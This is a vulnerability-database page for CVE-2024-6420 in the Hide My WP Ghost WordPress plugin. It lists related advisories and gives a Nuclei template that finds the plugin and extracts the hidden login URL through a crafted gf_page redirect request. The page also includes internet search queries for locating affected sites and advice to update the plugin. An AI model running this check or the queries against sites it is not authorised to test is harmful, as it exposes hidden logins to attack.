| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-6420 | 23 Jul 202408:52 | – | circl | |
| WordPress plugin Hide My WP Ghost 安全漏洞 | 23 Jul 202400:00 | – | cnnvd | |
| CVE-2024-6420 | 23 Jul 202406:00 | – | cve | |
| CVE-2024-6420 Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure | 23 Jul 202406:00 | – | cvelist | |
| CVE-2024-6420 | 23 Jul 202406:15 | – | nvd | |
| CVE-2024-6420 | 23 Jul 202406:15 | – | osv | |
| WordPress Hide My WP Ghost plugin < 5.2.02 - Hidden Login Page Disclosure vulnerability | 23 Jul 202406:34 | – | patchstack | |
| WordPress Hide My WP Ghost Plugin < 5.2.02 is vulnerable to Bypass Vulnerability | 23 Jul 202400:00 | – | patchstack | |
| PT-2024-37613 · WordPress · Hide My Wp Ghost | 23 Jul 202400:00 | – | ptsecurity | |
| CVE-2024-6420 | 23 May 202507:59 | – | redhatcve |
id: CVE-2024-6420
info:
name: Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
author: jpg0mez
severity: high
description: |
The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
impact: |
Unauthenticated attackers can discover and access the hidden WordPress login page through auth_redirect exploitation, bypassing the plugin's security obfuscation.
remediation: |
Update Hide My WP Ghost plugin to version 5.2.02 or later to address the login page disclosure vulnerability.
reference:
- https://wpscan.com/vulnerability/dfda6577-81aa-4397-a2d6-1d736f9ebd44/
- https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6420
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cve-id: CVE-2024-6420
epss-score: 0.018
epss-percentile: 0.75847
metadata:
verified: true
max-request: 2
framework: wordpress
fofa-query: body="/wp-content/plugins/hide-my-wp"
publicwww-query: "/wp-content/plugins/hide-my-wp/"
tags: cve,cve2024,bypass,wp,wp-plugin,wpscan,wordpress,hide-my-wp,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/hide-my-wp")'
- 'status_code == 200'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/?gf_page=randomstring"
matchers-condition: and
matchers:
- type: dsl
dsl:
- "!contains(tolower(location), 'wp-login.php')"
- type: word
part: header
words:
- '%2F%3Fgf_page%3Drandomstring&reauth=1'
extractors:
- type: kval
kval:
- location
# digest: 4b0a00483046022100b18deeb17fa3f23ff415e75024a8efc5558f74eea8395867757f757948fe5788022100981bc0f973c239c394a4012feeb224dc87056b3bd509973cbf4e4bccf1cea5e4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation